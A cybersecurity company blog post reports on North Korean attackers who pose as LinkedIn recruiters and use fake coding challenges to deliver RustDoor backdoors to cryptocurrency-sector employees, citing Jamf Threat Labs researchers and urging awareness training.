Blog Details

  • Home
  • Blog
  • North Korean Hackers Using LinkedIn to Spread RustDoor Malware
North Korean Hackers Using LinkedIn to Spread RustDoor Malware

North Korean Hackers Using LinkedIn to Spread RustDoor Malware

Cybersecurity researchers are continuing to warn about North Korean threat actors' attempts to target potential victims on LinkedIn to deliver a dangerous malware known as RustDoor.

According to a recent advisory from Jamf Threat Labs, a user was contacted on LinkedIn by someone pretending to be a recruiter for a legitimate decentralized cryptocurrency exchange called STON.fi. This is just one example of how Democratic People’s Republic of Korea (DPRK)-backed cyber attackers are infiltrating networks under the guise of job interviews or coding assignments.

These attacks are aimed at the financial and cryptocurrency sectors, which are prime targets for these state-sponsored adversaries. Their objective is clear: to generate illicit revenue by exploiting companies and individuals in the crypto industry.

The attackers use highly tailored and sophisticated social engineering tactics to trick employees of decentralized finance (DeFi) and cryptocurrency businesses. In some cases, they request that individuals execute code or download applications on company devices.

North Korean attackers often ask their targets to complete “pre-employment tests” that involve executing unfamiliar Node.js or PyPI packages, scripts, or GitHub repositories. One recent attack detected by Jamf involved tricking the victim into downloading a booby-trapped Visual Studio project as part of a coding challenge. This project contained commands to download two second-stage payloads—VisualStudioHelper and zsh_env—both of which are designed to act as backdoors.

The malware RustDoor, which was first documented by Bitdefender in February 2024, has been linked to North Korean cyber threat actors for the first time. It was previously known for targeting cryptocurrency firms and using sophisticated methods to infect both macOS and Windows systems.

This time, the RustDoor malware was designed using Objective-C and delivered through a deceptive coding challenge. Once installed, the VisualStudioHelper payload prompts the victim to enter their system password, appearing as a legitimate request from Visual Studio. The malware then steals critical system files and communicates with remote command-and-control (C2) servers.

Researchers Jaron Bradley and Ferdous Saljooki from Jamf highlighted the importance of training employees—especially developers—to be cautious when engaging with unknown contacts on social media platforms like LinkedIn. "These social engineering schemes performed by the DPRK come from attackers who are well-versed in English and highly informed about their targets," the researchers emphasized.

As the attacks continue to evolve, organizations within the crypto industry must stay vigilant and invest in robust cybersecurity awareness training to protect against these sophisticated campaigns.

© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067